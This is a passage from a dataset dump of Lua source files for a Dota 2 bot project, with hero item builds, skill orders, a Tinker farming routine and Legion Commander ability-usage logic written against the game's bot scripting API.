"text": "X = {}\nrequire(GetScriptDirectory() .. \"/UtilityFunctions\")\nlocal npcBot = GetBot()\nlocal talents = fillTalentTable(npcBot)\n\nX[\"items\"] = {\n \"item_enchanted_mango\",\n \"item_enchanted_mango\",\n \"item_enchanted_mango\",\n \"item_tango\",\n \"item_tango\",\n \"item_stout_shield\",\n -- Soul Ring --\n \"item_ring_of_regen\",\n \"item_gauntlets\",\n \"item_gauntlets\",\n \"item_recipe_soul_ring\",\n -- phase boots --\n \"item_boots\",\n \"item_blades_of_attack\",\n \"item_blades_of_attack\",\n -- magic wand\n \"item_magic_stick\",\n \"item_branches\",\n \"item_branches\",\n \"item_recipe_magic_wand\",\n \"item_blink\",\n \"item_broadsword\",\n \"item_chainmail\",\n \"item_robe\",\n \"item_ogre_axe\",\n \"item_mithril_hammer\",\n \"item_recipe_black_king_bar\"\n}\n\nlocal odds = \"legion_commander_overwhelming_odds\"\nlocal press = \"legion_commander_press_the_attack\"\nlocal courage = \"legion_commander_moment_of_courage\"\nlocal duel = \"legion_commander_duel\"\n\n\n-- special_bonus_strength_8\n-- special_bonus_exp_boost_25\n-- special_bonus_attack_speed_30\n-- special_bonus_unique_legion_commander_4\n-- special_bonus_movement_speed_60\n-- special_bonus_unique_legion_commander_3\n-- special_bonus_unique_legion_commander\n-- special_bonus_unique_legion_commander_2\n-- legion_commander_overwhelming_odds\n-- legion_commander_press_the_attack\n-- legion_commander_moment_of_courage\n-- legion_commander_duel\n\nlocal t1 = \"special_bonus_exp_boost_25\"\nlocal t2 = \"special_bonus_attack_speed_30\"\nlocal t3 = \"special_bonus_movement_speed_60\"\nlocal t4 = \"special_bonus_unique_legion_commander\"\n\nX[\"skills\"] = {\n odds, -- 1\n courage, -- 2 \n odds, -- 3\n press, -- 4\n odds, -- 5\n duel, -- 6\n odds, -- 7\n press, -- 8\n press, -- 9\n t1, -- 10\n press, -- 11 \n duel, -- 12\n courage, -- 13\n courage, -- 14\n t2, -- 15\n courage, -- 16 \n \"-1\", -- 17\n duel, -- 18\n \"-1\", -- 19\t\n t3, -- 20\n \"-1\", -- 21 \t\n \"-1\", -- 22\n \"-1\", -- 23\n \"-1\", -- 24\n t4 -- 25\n}\n\nreturn X"
},
{
"alpha_fraction": 0.4931506812572479,
"alphanum_fraction": 0.5280821919441223,
"avg_line_length": 23.762712478637695,
"blob_id": "b3f33201562d1020acbd15b4fd7192ed56e71d58",
"content_id": "616fd44798b83fc28ababd01a969792e76d5296b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 1460,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 59,
"path": "/item_build_keeper_of_the_light.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "X = {}\nrequire(GetScriptDirectory() .. \"/UtilityFunctions\")\nlocal npcBot = GetBot()\nlocal talents = fillTalentTable(npcBot)\n\nX[\"items\"] = {\n\t\"item_boots\",\n \"item_ring_of_regen\",\n \"item_wind_lace\",\n \"item_staff_of_wizardry\",\n \"item_ring_of_health\",\n \"item_recipe_force_staff\",\n \"item_ogre_axe\",\n \"item_staff_of_wizardry\",\n \"item_blade_of_alacrity\",\n \"item_point_booster\",\n \"item_platemail\",\n \"item_energy_booster\",\n \"item_ring_of_health\",\n \"item_void_stone\",\n \"item_gem\"\n}\n\nlocal illuminate = \"keeper_of_the_light_illuminate\"\nlocal manaleak = \"keeper_of_the_light_mana_leak\"\nlocal chakra = \"keeper_of_the_light_chakra_magic\"\nlocal spiritform = \"keeper_of_the_light_spirit_form\"\nlocal recall = \"keeper_of_the_light_recall\"\nlocal blinding = \"keeper_of_the_light_blinding_light\"\n\nX[\"skills\"] = {\n illuminate, --1\n chakra, --2 \n chakra, --1\n illuminate, --4\n illuminate, --5\n chakra, --6\n illuminate, --7\n chakra, --8\n spiritform, --9\n talents[2], --10\n manaleak, --11\n manaleak, --12\n manaleak, --13\n manaleak, --14\n talents[3], --15\n spiritform, --16\n \"-1\", --17\n spiritform, --18\n \"-1\", --19\n talents[5], --20\n \"-1\", \t --21\n \"-1\", \t --22\n \"-1\", --23\n \"-1\", --24\n talents[8] --25\n}\n\nreturn X"
},
{
"alpha_fraction": 0.610188901424408,
"alphanum_fraction": 0.6285060048103333,
"avg_line_length": 22.30666732788086,
"blob_id": "d2f5ae7b72e4c3078df12307888f7d37ecca75c9",
"content_id": "370916e599e7e0df84b7c4bf8700cbcce804b9cb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 1747,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 75,
"path": "/item_build_techies.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "X = {}\nrequire(GetScriptDirectory() .. \"/UtilityFunctions\");\nlocal npcBot = GetBot();\nlocal talents = fillTalentTable(npcBot);\n\nX[\"items\"] = {\n\t\"item_enchanted_mango\",\n\t\"item_sobi_mask\",\n\t\"item_clarity\",\n\t\"item_ring_of_regen\",\n\t\"item_boots\",\n\t\"item_energy_booster\",\n\t\"item_point_booster\",\n\t\"item_staff_of_wizardry\",\n\t\"item_recipe_force_staff\",\n\t\"item_wind_lace\",\n\t\"item_void_stone\",\n\t\"item_staff_of_wizardry\",\n\t\"item_recipe_cyclone\",\n\t\"item_energy_booster\",\n\t\"item_vitality_booster\",\n\t\"item_recipe_bloodstone\",\n\t\"item_point_booster\",\n\t\"item_ogre_axe\",\n\t\"item_staff_of_wizardry\",\n\t\"item_blade_of_alacrity\",\n\t\"item_void_stone\",\n\t\"item_ultimate_orb\",\n\t\"item_mystic_staff\"\n};\n\n-- Set up Skill build\nlocal prox_mines = \"techies_land_mines\";\nlocal stasis_trap = \"techies_stasis_trap\";\nlocal blast_off = \"techies_suicide\";\nlocal remote_mines = \"techies_remote_mines\"; \n\nlocal ABILITY1 = \"special_bonus_mp_regen_2\"\nlocal ABILITY2 = \"special_bonus_movement_speed_20\"\nlocal ABILITY3 = \"special_bonus_cast_range_200\"\nlocal ABILITY4 = \"special_bonus_exp_boost_30\"\nlocal ABILITY5 = \"special_bonus_respawn_reduction_60\"\nlocal ABILITY6 = \"special_bonus_gold_income_20\"\nlocal ABILITY7 = \"special_bonus_unique_techies\"\nlocal ABILITY8 = \"special_bonus_cooldown_reduction_20\"\n\nX[\"skills\"] = {\n prox_mines, \n blast_off, \n prox_mines, \n blast_off, \n prox_mines,\n remote_mines, \n stasis_trap, \n blast_off, \n prox_mines, \n talents[2],\n stasis_trap, \n remote_mines, \n stasis_trap, \n stasis_trap, \n talents[3],\n blast_off, \n \"-1\", \n remote_mines, \n \"-1\", \t\n talents[6],\n \"-1\", \t\n \"-1\", \t\n \"-1\", \n \"-1\", \n talents[7]\n};\n\nreturn X"
},
{
"alpha_fraction": 0.6354639530181885,
"alphanum_fraction": 0.6480038166046143,
"avg_line_length": 37.82368469238281,
"blob_id": "3d0b86b57a3702f387e457a5763da622806e2ee1",
"content_id": "0415580060085ce9b704289e0d07f6f1970c619c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 14753,
"license_type": "no_license",
"max_line_length": 143,
"num_lines": 380,
"path": "/mode_farm_tinker.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "require(GetScriptDirectory()..\"/UtilityData\")\nrequire(GetScriptDirectory()..\"/UtilityFunctions\")\n\nlocal npcBot = GetBot()\nlocal botTeam = GetTeam()\n\nlocal sequence = 0\n\nfunction GetDesire()\n\tlocal gameTime = DotaTime()\n\tlocal bootsSlot = npcBot:FindItemSlot(\"item_travel_boots\")\n\tif npcBot:GetItemSlotType(bootsSlot) == ITEM_SLOT_TYPE_MAIN or gameTime < 0 then\n\t\treturn _G.desires[6]\n\tend\n\t\n\treturn _G.desires[0]\nend\n\nfunction Think()\n\tlocal gameTime = DotaTime()\n\tlocal botLoc = npcBot:GetLocation()\n\tlocal action = npcBot:GetCurrentActionType()\n\tlocal botMana = npcBot:GetMana()\n\tlocal botHealth = npcBot:GetHealth()\n\tlocal botMaxHealth = npcBot:GetMaxHealth()\n\tlocal botMaxMana = npcBot:GetMaxMana()\n\tlocal botHPRegen = npcBot:GetHealthRegen()\n\tlocal botManaRegen = npcBot:GetManaRegen()\n\tlocal level = npcBot:GetLevel()\n\tlocal blinkSlot = npcBot:FindItemSlot(\"item_blink\")\n\tlocal bootsSlot = npcBot:FindItemSlot(\"item_travel_boots\")\n\tlocal currentGold = npcBot:GetGold()\n\tlocal currentLane = nil\n\t\n\tlocal boots = nil\n\tlocal blink = nil\n\tif npcBot:GetItemSlotType(bootsSlot) == ITEM_SLOT_TYPE_MAIN then\n\t\tboots = npcBot:GetItemInSlot(bootsSlot)\n\tend\n\tif npcBot:GetItemSlotType(blinkSlot) == ITEM_SLOT_TYPE_MAIN then\n\t\tblink = npcBot:GetItemInSlot(blinkSlot)\n\tend\n\t\n\tlocal towerStatusTopRad = _G.GetTowerStatus(\"top\", TEAM_RADIANT)\n\tlocal towerStatusMidRad = _G.GetTowerStatus(\"mid\", TEAM_RADIANT)\n\tlocal towerStatusBotRad = _G.GetTowerStatus(\"bot\", TEAM_RADIANT)\n\tlocal towerStatusTopDir = _G.GetTowerStatus(\"top\", TEAM_DIRE)\n\tlocal towerStatusMidDir = _G.GetTowerStatus(\"mid\", TEAM_DIRE)\n\tlocal towerStatusBotDir = _G.GetTowerStatus(\"bot\", TEAM_DIRE)\n\t\n\tlocal creepLaneTopRad = _G.GetLaneCreepStatus(LANE_TOP, TEAM_RADIANT)\n\tlocal creepLaneMidRad = _G.GetLaneCreepStatus(LANE_MID, TEAM_RADIANT)\n\tlocal creepLaneBotRad = _G.GetLaneCreepStatus(LANE_BOT, TEAM_RADIANT)\n\tlocal creepLaneTopDir = _G.GetLaneCreepStatus(LANE_TOP, TEAM_DIRE)\n\tlocal creepLaneMidDir = _G.GetLaneCreepStatus(LANE_MID, TEAM_DIRE)\n\tlocal creepLaneBotDir = _G.GetLaneCreepStatus(LANE_BOT, TEAM_DIRE)\n\t\n\tlocal laser = npcBot:GetAbilityByName(\"tinker_laser\");\n\tlocal missile = npcBot:GetAbilityByName(\"tinker_heat_seeking_missile\");\n\tlocal march = npcBot:GetAbilityByName(\"tinker_march_of_the_machines\");\n\tlocal rearm = npcBot:GetAbilityByName(\"tinker_rearm\");\n\t\n\tlocal allies = GetUnitList(UNIT_LIST_ALLIED_HEROES)\n\tlocal enemies = GetUnitList(UNIT_LIST_ENEMY_HEROES)\n\t\n\tlocal topFrontAmount = GetLaneFrontAmount(botTeam, LANE_TOP, false)\n\tlocal midFrontAmount = GetLaneFrontAmount(botTeam, LANE_MID, false)\n\tlocal botFrontAmount = GetLaneFrontAmount(botTeam, LANE_BOT, false)\n\t\n\tlocal topFrontLoc = GetLaneFrontLocation(botTeam, LANE_TOP, 0)\n\tlocal midFrontLoc = GetLaneFrontLocation(botTeam, LANE_MID, 0)\n\tlocal botFrontLoc = GetLaneFrontLocation(botTeam, LANE_BOT, 0)\n\t\n\tlocal enemyHeroes = GetUnitList(UNIT_LIST_ENEMY_HEROES)\n\tlocal topEnemies = 0\n\tlocal midEnemies = 0\n\tlocal botEnemies = 0\n\t\n\tfor e = 1, table.getn(enemyHeroes) do\n\t\tlocal enemy = enemyHeroes[e]\n\t\tif enemy ~= nil then\n\t\t\tlocal topDist = GetUnitToLocationDistance(enemy, topFrontLoc)\n\t\t\tlocal midDist = GetUnitToLocationDistance(enemy, midFrontLoc)\n\t\t\tlocal botDist = GetUnitToLocationDistance(enemy, botFrontLoc)\n\t\t\t\n\t\t\tif topDist < 1000 then\n\t\t\t\ttopEnemies = topEnemies + 
1\n\t\t\tend\n\t\t\tif midDist < 1000 then\n\t\t\t\tmidEnemies = midEnemies + 1\n\t\t\tend\n\t\t\tif botDist < 1000 then\n\t\t\t\tbotEnemies = botEnemies + 1\n\t\t\tend\n\t\t\t\n\t\tend\n\tend\n\t\n\tif currentLane == nil then\n\t\tlocal lanes = {}\n \tif topFrontAmount <= midFrontAmount and topFrontAmount <= botFrontAmount then\n \t\ttable.insert(lanes, LANE_TOP)\n \t\tif midFrontAmount <= botFrontAmount then\n \t\t\ttable.insert(lanes, LANE_MID)\n \t\t\ttable.insert(lanes, LANE_BOT)\n \t\telse\n \t\t\ttable.insert(lanes, LANE_BOT)\n \t\t\ttable.insert(lanes, LANE_MID)\n \t\tend\n \telseif midFrontAmount <= topFrontAmount and midFrontAmount <= botFrontAmount then\n \t\ttable.insert(lanes, LANE_MID)\n \t\tif topFrontAmount <= botFrontAmount then\n \t\t \ttable.insert(lanes, LANE_TOP)\n \t\t\ttable.insert(lanes, LANE_BOT)\n \t\telse\n \t\t \ttable.insert(lanes, LANE_BOT)\n \t\t\ttable.insert(lanes, LANE_TOP)\n \t\tend\n \telseif botFrontAmount <= topFrontAmount and botFrontAmount <= midFrontAmount then\n \t\ttable.insert(lanes, LANE_BOT)\n \t\tif midFrontAmount <= topFrontAmount then\n \t\t \ttable.insert(lanes, LANE_MID)\n \t\t\ttable.insert(lanes, LANE_TOP)\n \t\telse\n \t\t \ttable.insert(lanes, LANE_TOP)\n \t\t\ttable.insert(lanes, LANE_MID)\n \t\tend\n \tend\n \n for l = 1, table.getn(lanes) do\n \tlocal lane = lanes[l]\n \t\n \tif lane == LANE_TOP then\n \t\tif topEnemies < 2 then\n \t\t\tcurrentLane = LANE_TOP\n \t\t\tbreak\n \t\tend\n \telseif lane == LANE_MID then\n \t\tif midEnemies < 2 then\n \t\t\tcurrentLane = LANE_MID\n \t\t\tbreak\n \t\tend\n \telse\n \t\tif botEnemies < 2 then\n \t\t\tcurrentLane = LANE_BOT\n \t\t\tbreak\n \t\tend\n \tend\n end\n end\n \n\tif currentLane ~= nil and gameTime > 0 and boots ~= nil and action ~= BOT_ACTION_TYPE_USE_ABILITY and not npcBot:IsChanneling() then\n\t\tlocal frontLoc = GetLaneFrontLocation(botTeam, currentLane, 200)\n\t\tlocal fountainLoc = GetShopLocation(GetTeam(), SHOP_HOME)\n\t\tlocal frontDist = GetUnitToLocationDistance(npcBot, frontLoc)\n\t\tlocal fountainDist = GetUnitToLocationDistance(npcBot, fountainLoc)\n\t\tlocal nearbyCreeps = npcBot:GetNearbyCreeps(1600, true)\n\t\tlocal nearbyEnemies = npcBot:GetNearbyHeroes(1600, true, BOT_MODE_NONE)\n\t\t\n\t\tlocal numCreeps = table.getn(nearbyCreeps)\n\t\tlocal numEnemies = table.getn(nearbyEnemies)\n\t\t\n\t\tlocal marchMana = march:GetManaCost()\n\t\tlocal laserMana = laser:GetManaCost()\n\t\tlocal bootsMana = boots:GetManaCost()\n\t\t\n--\t\tlocal castedMarch = false\n-- local castedBlink = false\n-- \n-- local maxFountDist = 500\n-- local maxFrontDist = 500\n-- \n-- local queueSize = npcBot:NumQueuedActions()\n-- \n-- if not npcBot:IsChanneling() and queueSize == 0 then\n-- -- At Fountain\n-- if fountainDist < maxFountDist then\n-- if fountainDist < 300 then\n-- if botMana/botMaxMana > 0.75 then\n-- if boots:IsFullyCastable() then\n-- -- TP to lane\n-- print(\" Teleporting to Lane Front\")\n-- npcBot:Action_UseAbilityOnLocation(boots, frontLoc)\n-- else\n-- \tprint(\" Rearming!\")\n-- npcBot:Action_UseAbility(rearm)\n-- end\n-- end\n-- else\n-- -- Move to fountain\n-- print(\" Walking to Fountain\")\n-- npcBot:Action_MoveToLocation(fountainLoc)\n-- end\n-- -- At Lane Front\n-- elseif frontDist < maxFrontDist then\n-- -- Cast March\n-- if numCreeps > 0 and botMana >= (march:GetManaCost() + boots:GetManaCost() + rearm:GetManaCost()) then\n-- local distToPoint = GetUnitToLocationDistance(npcBot, nearbyCreeps[1]:GetLocation())\n-- \t\t\t\tlocal marchLoc = 
nearbyCreeps[1]:GetLocation()\n-- \t\t\t\tif distToPoint < 900 then\n-- \t\t\t\t\tif distToPoint >= 300 then\n-- \t\t\t\t\t\tmarchLoc = _G.getVectorBetweenTargetDistance(npcBot, nearbyCreeps[1], 300)\n-- \t\t\t\t\t\tnpcBot:Action_UseAbilityOnLocation(march, marchLoc)\n-- \t\t\t\t\telse\n-- \t\t\t\t\t\tnpcBot:Action_UseAbilityOnLocation(march, marchLoc)\n-- \t\t\t\t\tend\n-- \t\t\t\telse\n-- \t\t\t\t\tnpcBot:Action_MoveToLocation(marchLoc)\n-- \t\t\t\tend\n--\t\t\t\t\tprint(\" Casting March\")\n-- npcBot:Action_UseAbilityOnLocation(march, marchLoc)\n-- if botMana < (march:GetManaCost() + boots:GetManaCost() + rearm:GetManaCost()) then\n-- -- Don't cast March again if mana isn't enough\n-- print(\" Done Marching!\")\n-- castedMarch = true\n-- end\n-- -- Done Marching, TP to fountain\n-- elseif castedMarch then\n-- -- Queue rearm if boots is under cooldown\n-- if not boots:IsCooldownReady() then\n-- \tprint(\" Queueing Rearm AND TP to Fountain\")\n-- npcBot:ActionQueue_UseAbility(rearm)\n-- else\n-- \tprint(\" Teleporting to Fountain\")\n-- end\n-- npcBot:ActionQueue_UseAbilityOnLocation(boots, fountainLoc)\n-- -- Walk to Front\n-- elseif numCreeps == 0 and not castedMarch then\n-- \tprint(\" Walking to Front\")\n-- npcBot:Action_MoveToLocation(frontLoc)\n-- -- Can't do anything else but attack\n-- elseif numCreeps > 0 and not castedMarch and action ~= BOT_ACTION_TYPE_ATTACK then\n-- \tprint(\" Nothing To Do, Attacking Creeps\")\n-- npcBot:Action_AttackUnit(nearbyCreeps[1], true)\n-- elseif boots:IsFullyCastable() then\n-- \tnpcBot:Action_UseAbilityOnLocation(boots, fountainLoc)\n-- end\n-- end\n-- end\n\t\t\n\t\tprint(sequence)\n\t\t-- Return To Base\n\t\tif sequence == 0 then\n\t\t\tif boots:IsFullyCastable() and GetUnitToLocationDistance(npcBot, fountainLoc) > 1000 and not npcBot:IsChanneling() then\n\t\t\t\tprint(\"0: Casting Boots To Fountain\")\n\t\t\t\tnpcBot:Action_UseAbilityOnLocation(boots, fountainLoc)\n\t\t\t\tsequence = 1\n\t\t\telseif GetUnitToLocationDistance(npcBot, fountainLoc) <= 1000 then\n\t\t\t\tsequence = 1\n\t\t\telseif not boots:IsCooldownReady() and not npcBot:IsChanneling() then\n\t\t\t\tprint(\"0: REARMING!\")\n\t\t\t\tnpcBot:Action_UseAbility(rearm)\n\t\t\telseif not boots:IsFullyCastable() and not rearm:IsFullyCastable() then\n\t\t\t\tnpcBot:Action_MoveToLocation(fountainLoc)\n\t\t\tend\n\t\t-- Rearm\n\t\telseif sequence == 1 then\n\t\t\tif GetUnitToLocationDistance(npcBot, fountainLoc) <= 1000 \n\t\t\t\tand rearm:IsFullyCastable() \n\t\t\t\tand not npcBot:IsChanneling()\n\t\t\t\tand not boots:IsCooldownReady() then\n\t\t\t\tprint(\"1: REARMING!\")\n\t\t\t\tnpcBot:Action_UseAbility(rearm)\n\t\t\t\tsequence = 2\n\t\t\telseif GetUnitToLocationDistance(npcBot, fountainLoc) > 1000 then\n\t\t\t\tprint(\"1: Too Far From Fountain, Back to 0\")\n\t\t\t\tsequence = 0\n\t\t\telseif GetUnitToLocationDistance(npcBot, fountainLoc) <= 1000 \n\t\t\t\tand boots:IsCooldownReady() then\n\t\t\t\tprint(\"2: Waiting For Mana At Fountain\")\n\t\t\t\tsequence = 2\n\t\t\tend\n\t\t-- Wait For Mana\n\t\telseif sequence == 2 then\n\t\t\tif botMana/botMaxMana >= 0.8 then\n\t\t\t\tsequence = 3\n\t\t\tend\n\t\t-- TP To Lane Front\n\t\telseif sequence == 3 then\n\t\t\tif frontDist >= 500 and boots:IsFullyCastable() and not npcBot:IsChanneling() then\n\t\t\t\tprint(\"3: Casting Boots To Lane\")\n\t\t\t\tnpcBot:Action_UseAbilityOnLocation(boots, GetLaneFrontLocation(botTeam, currentLane, 200))\n\t\t\t\tsequence = 4\n\t\t\telseif not boots:IsFullyCastable() and rearm:IsFullyCastable() and not 
npcBot:IsChanneling() then\n\t\t\t\tprint(\"3: REARMING!\")\n\t\t\t\tnpcBot:Action_UseAbility(rearm)\n\t\t\telseif frontDist < 500 then\n\t\t\t\tsequence = 4\n\t\t\tend\n\t\t-- Blink If You Can!\n\t\telseif sequence == 4 then\n\t\t\tif blink ~= nil and numEnemies > 0 then\n\t\t\t\tif blink:IsFullyCastable() and not npcBot:IsChanneling() then\n\t\t\t\t\tprint(\"4: Time To Blink!\")\n--\t\t\t\t\tlocal trees = npcBot:GetNearbyTrees(1000)\n--\t\t\t\t\tlocal treeLocs = {}\n--\t\t\t\t\tfor tree in ipairs(trees) do\n--\t\t\t\t\t\ttable.insert(treeLocs, GetTreeLocation(tree))\n--\t\t\t\t\tend\n--\t\t\t\t\t\n--\t\t\t\t\tlocal centroids = _G.clusterAndGetCentroids(treeLocs)\n--\t\t\t\t\tprint(table.getn(centroids))\n--\t\t\t\t\tif table.getn(centroids) > 0 then\n--\t\t\t\t\t\tlocal closestDist = 0\n--\t\t\t\t\t\tlocal closestPoint = nil\n--\t\t\t\t\t\tfor centroid in ipairs(centroids) do\n--\t\t\t\t\t\t\tlocal dist = GetUnitToLocationDistance(npcBot, centroid)\n--\t\t\t\t\t\t\tif closestDist == 0 then\n--\t\t\t\t\t\t\t\tclosestDist = dist\n--\t\t\t\t\t\t\t\tclosestPoint = centroid\n--\t\t\t\t\t\t\telseif closestDist > dist then\n--\t\t\t\t\t\t\t\tclosestDist = dist\n--\t\t\t\t\t\t\t\tclosestPoint = centroid\n--\t\t\t\t\t\t\tend\n--\t\t\t\t\t\tend\n--\t\t\t\t\t\t\n--\t\t\t\t\t\tnpcBot:Action_UseAbilityOnLocation(blink, closestPoint)\n--\t\t\t\t\telse\n--\t\t\t\t\t\tnpcBot:Action_UseAbilityOnLocation(blink, fountain)\n--\t\t\t\t\tend\n\t\t\t\t\tnpcBot:Action_UseAbilityOnLocation(blink, fountainLoc)\n\t\t\t\t\tsequence = 5\n\t\t\t\tend\n\t\t\telse\n\t\t\t\tsequence = 5\n\t\t\tend\n\t\t-- Cast March In Creep Lane\n\t\telseif sequence == 5 then\n\t\t\tif march:IsFullyCastable() and botMana >= (marchMana + bootsMana) and numCreeps > 1 and not npcBot:IsChanneling() then\n\t\t\t\tprint(\"5: Casting March!\")\n\t\t\t\tlocal distToPoint = GetUnitToLocationDistance(npcBot, nearbyCreeps[1]:GetLocation())\n\t\t\t\tlocal marchLoc = nearbyCreeps[1]:GetLocation()\n\t\t\t\tprint(distToPoint)\n\t\t\t\tif distToPoint < 900 then\n\t\t\t\t\tif distToPoint >= 300 then\n\t\t\t\t\t\tmarchLoc = _G.getVectorBetweenTargetDistance(npcBot, nearbyCreeps[1], 300)\n\t\t\t\t\t\tnpcBot:Action_UseAbilityOnLocation(march, marchLoc)\n\t\t\t\t\telse\n\t\t\t\t\t\tnpcBot:Action_UseAbilityOnLocation(march, marchLoc)\n\t\t\t\t\tend\n\t\t\t\telse\n\t\t\t\t\tnpcBot:Action_MoveToLocation(marchLoc)\n\t\t\t\tend\n\t\t\t\tsequence = 6\n\t\t\telseif numCreeps == 0 and frontDist >= 2000 and not npcBot:IsChanneling() then\n\t\t\t\tsequence = 3\n\t\t\telseif numCreeps == 0 and frontDist < 2000 and not npcBot:IsChanneling() then\n\t\t\t\tprint(\"5: Too Far From Creeps, Walking\")\n\t\t\t\tnpcBot:Action_MoveToLocation(frontLoc)\n\t\t\telseif laser:IsFullyCastable() and botMana >= (laserMana + bootsMana) and numCreeps > 0 and numCreeps < 2 and not npcBot:IsChanneling() then\n\t\t\t\tprint(\"5: Not Enough Creeps Around, Casting Laser\")\n\t\t\t\tnpcBot:Action_UseAbilityOnEntity(laser, nearbyCreeps[1])\n\t\t\telseif botMana < (marchMana + bootsMana) then\n\t\t\t\tprint(\"5: No Mana, Moving On\")\n\t\t\t\tsequence = 6\n\t\t\tend\n\t\t-- Cast March Again Or Move On\n\t\telseif sequence == 6 then\n\t\t\tif march:IsFullyCastable() and numCreeps > 1 and botMana >= (marchMana + bootsMana) and not npcBot:IsChanneling() then\n\t\t\t\tprint(\"6: Casting March Again\")\n\t\t\t\tnpcBot:Action_UseAbilityOnLocation(march, nearbyCreeps[1]:GetLocation())\n\t\t\t\tsequence = 7\n\t\t\telseif not march:IsFullyCastable() and numCreeps > 1 and botMana >= (marchMana + 
bootsMana) and not npcBot:IsChanneling() then\n\t\t\t\tnpcBot:Action_UseAbility(rearm)\n\t\t\telse\n\t\t\t\tsequence = 7\n\t\t\tend\n\t\t-- Rearm And Start Over\n\t\telseif sequence == 7 then\n\t\t\tif rearm:IsFullyCastable() and not npcBot:IsChanneling() then\n\t\t\t\tprint(\"7: REARMING!\")\n\t\t\t\tnpcBot:Action_UseAbility(rearm)\n\t\t\t\tprint(\"7: Back To 0\")\n\t\t\t\tsequence = 0\n\t\t\tend\n\t\tend\n\telseif gameTime < 0 then\n\t\tnpcBot:Action_MoveToLocation(GetTower(botTeam, TOWER_MID_1):GetLocation() + RandomVector(200))\n\tend\nend\n"
},
{
"alpha_fraction": 0.6371167898178101,
"alphanum_fraction": 0.6487158536911011,
"avg_line_length": 32.79600143432617,
"blob_id": "3f9afcff2eee952b7da2a87248222f0993ec425a",
"content_id": "1999bae142186be77be2091fa3c9731162fdc23f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 8449,
"license_type": "no_license",
"max_line_length": 126,
"num_lines": 250,
"path": "/ability_item_usage_legion_commander.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "local build = require(GetScriptDirectory()..\"/item_build_legion_commander\")\nrequire(GetScriptDirectory()..\"/UtilityData\")\nrequire(GetScriptDirectory()..\"/UtilityFunctions\")\n\nlocal npcBot = GetBot()\nlocal botTeam = GetTeam()\nlocal lane_claim = true\n\nnpcBot.duel = false\nnpcBot.target = nil\nnpcBot.blink = false\nnpcBot.press = false\n\nlocal odds = npcBot:GetAbilityByName(\"legion_commander_overwhelming_odds\")\nlocal press = npcBot:GetAbilityByName(\"legion_commander_press_the_attack\")\nlocal courage = npcBot:GetAbilityByName(\"legion_commander_moment_of_courage\") \nlocal duel = npcBot:GetAbilityByName(\"legion_commander_duel\")\n\nfunction BuybackUsageThink()end\n\nfunction AbilityLevelUpThink()\n\tlocal skillsToLevel = build[\"skills\"]\n\tif npcBot:GetAbilityPoints() > 0 and skillsToLevel[1] ~= nil then\n\t\tnpcBot:ActionImmediate_LevelAbility(skillsToLevel[1])\n\t\ttable.remove(skillsToLevel, 1)\n\tend\nend\n\n-- Logic for all Ability Usage behavior\nfunction AbilityUsageThink()\n\t-- Stats\n\tlocal botMana = npcBot:GetMana()\n\tlocal botMaxMana = npcBot:GetMaxMana()\n\tlocal botHP = npcBot:GetHealth()\n\tlocal botMaxHP = npcBot:GetMaxHealth()\n\tlocal botLevel = npcBot:GetLevel()\n\tlocal mode = npcBot:GetActiveMode()\n\tlocal action = npcBot:GetCurrentActionType()\n\tlocal allyList = GetUnitList(UNIT_LIST_ALLIES)\n\tlocal botMode = npcBot:GetActiveMode()\n\n\t-- Nearby Units\n\tlocal allies = npcBot:GetNearbyHeroes(1000, false, BOT_MODE_NONE)\n\tlocal enemies = npcBot:GetNearbyHeroes(1000, true, BOT_MODE_NONE)\n\tlocal enemyCreeps = npcBot:GetNearbyLaneCreeps(1000, true)\n\tlocal allyCreeps = npcBot:GetNearbyLaneCreeps(1000, false)\n\tlocal neutrals = npcBot:GetNearbyNeutralCreeps(1000)\n\t\n\tlocal numAllies = table.getn(allies)\n\tlocal numEnemies = table.getn(enemies)\n\tlocal numEnemyCreeps = table.getn(enemyCreeps)\n\tlocal numAllyCreeps = table.getn(allyCreeps)\n\tlocal numNeutrals = table.getn(neutrals)\n\n\t-- OVERWHELMING ODDS Usage\n\tif odds:IsCooldownReady() and action ~= BOT_ACTION_TYPE_USE_ABILITY then\n\t\tlocal totalEnemies = numEnemies * 2 + numEnemyCreeps\n\t\t-- MANGO\n\t\tif odds:GetLevel() > 1 then\n \t\tlocal mangoLoc = npcBot:FindItemSlot(\"item_enchanted_mango\")\n local mango = nil\n if npcBot:GetItemSlotType(mangoLoc) == ITEM_SLOT_TYPE_MAIN then\n mango = npcBot:GetItemInSlot(mangoLoc)\n end\n \n if mango ~= nil and botMana < 100 and botLevel > 1 then\n \tnpcBot:Action_UseAbility(mango)\n end\n end\n \n useSoulRing()\n \n\t\tif totalEnemies >= 4 then\n\t\t\tlocal enemyLocs = {}\n\t\t\t\n\t\t\tfor e = 1, numEnemies do\n\t\t\t\ttable.insert(enemyLocs, enemies[e]:GetLocation())\n\t\t\tend\n\t\t\n\t\t\tfor c = 1, numEnemyCreeps do\n\t\t\t\ttable.insert(enemyLocs, enemyCreeps[c]:GetLocation())\n\t\t\tend\n\t\t\t\n\t\t\tlocal centroid = _G.getCentroid(enemyLocs)\n\t\t\tnpcBot:Action_UseAbilityOnLocation(odds, centroid)\n\t\telseif mnode == BOT_MODE_ATTACK then\n\t\t\tif numEnemies > 0 then\n\t\t\t\tnpcBot:Action_UseAbilityOnLocation(odds, enemies[1]:GetLocation())\n\t\t\tend\n\t\tend\n\tend\n\n\t-- PRESS THE ATTACK Usage\n if press:IsFullyCastable() and action ~= BOT_ACTION_TYPE_USE_ABILITY then\n local shield_cast = false\n local shield_target = npcBot\n local shield_target_health = npcBot:GetHealth()\n local nearbyAllies = npcBot:GetNearbyHeroes(1000, false, BOT_MODE_NONE)\n local nearbyEnemies_675 = npcBot:GetNearbyHeroes(675, true, BOT_MODE_NONE)\n for j, ally in pairs(nearbyAllies) do\n if 